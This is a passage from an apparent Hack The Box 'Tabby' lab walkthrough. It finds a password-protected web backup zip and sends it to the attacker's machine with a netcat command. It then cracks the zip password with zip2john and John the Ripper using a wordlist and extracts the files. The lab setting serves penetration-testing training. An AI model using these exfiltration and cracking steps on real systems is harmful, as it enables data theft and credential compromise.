Backup
Checking the web root directory after performing basic enumeration
tomcat@tabby:/var/www/html$ ll
total 48K
4.0K drwxr-xr-x 4 ash ash 4.0K Aug 19 2021 files
4.0K drwxr-xr-x 3 root root 4.0K Aug 19 2021 ..
4.0K drwxr-xr-x 4 root root 4.0K Aug 19 2021 .
4.0K drwxr-xr-x 6 root root 4.0K Aug 19 2021 assets
16K -rw-r--r-- 1 root root 14K Jun 17 2020 index.php
4.0K -rw-r--r-- 1 root root 123 Jun 16 2020 news.php
4.0K -rw-r--r-- 1 root root 2.9K May 21 2020 logo.png
4.0K -rw-r--r-- 1 root root 1.6K Mar 10 2016 Readme.txt
4.0K -rw-r--r-- 1 root root 766 Jan 13 2016 favicon.icoI can see the vulnerable news.php file that had the LFI vulnerability
tomcat@tabby:/var/www/html$ cd files ; ll
total 36K
4.0K drwxr-xr-x 4 ash ash 4.0K Aug 19 2021 .
4.0K drwxr-xr-x 2 root root 4.0K Aug 19 2021 revoked_certs
4.0K drwxr-xr-x 4 root root 4.0K Aug 19 2021 ..
4.0K drwxr-xr-x 2 root root 4.0K Aug 19 2021 archive
12K -rw-r--r-- 1 ash ash 8.6K Jun 16 2020 16162020_backup.zip
8.0K -rw-r--r-- 1 root root 6.4K Jun 16 2020 statementLooking into the files directory, there is an interesting archive; 16162020_backup.zip
This was initially picked up by PEAS earlier and it appears to be a backup file for the web application
additionally, its ownership is set to ash:ash
tomcat@tabby:/var/www/html/files$ nc 10.10.16.5 2222 < ./16162020_backup.zip
┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ nnc 2222 > 16162020_backup.zip
listening on [any] 2222 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.194] 43048Transferring the archive to Kali for further analysis
16162020_backup.zip
┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ unzip 16162020_backup.zip
Archive: 16162020_backup.zip
creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: The archive is password-protected and the Tomcat credential failed I will attempt to crack the password hash
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ zip2john 16162020_backup.zip > 16162020_backup.zip.hashFirst, turning the file signature into a hash string for john to work with
┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ john 16162020_backup.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (16162020_backup.zip)
1g 0:00:00:00 DONE (2023-09-23 13:58) 1.666g/s 17264Kp/s 17264Kc/s 17264KC/s adzlove..adj1029
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Password hash cracked; admin@it
This password must be checked for password reuse
Extraction
┌──(kali㉿kali)-[~/…/htb/labs/tabby/backup]
└─$ unzip 16162020_backup.zip
Archive: 16162020_backup.zip
creating: var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: admin@it
inflating: var/www/html/favicon.ico
creating: var/www/html/files/
inflating: var/www/html/index.php
extracting: var/www/html/logo.png
inflating: var/www/html/news.php
inflating: var/www/html/Readme.txt Extracting the content with the cracked password
While It was indeed the backup file of the web application, there is not much in it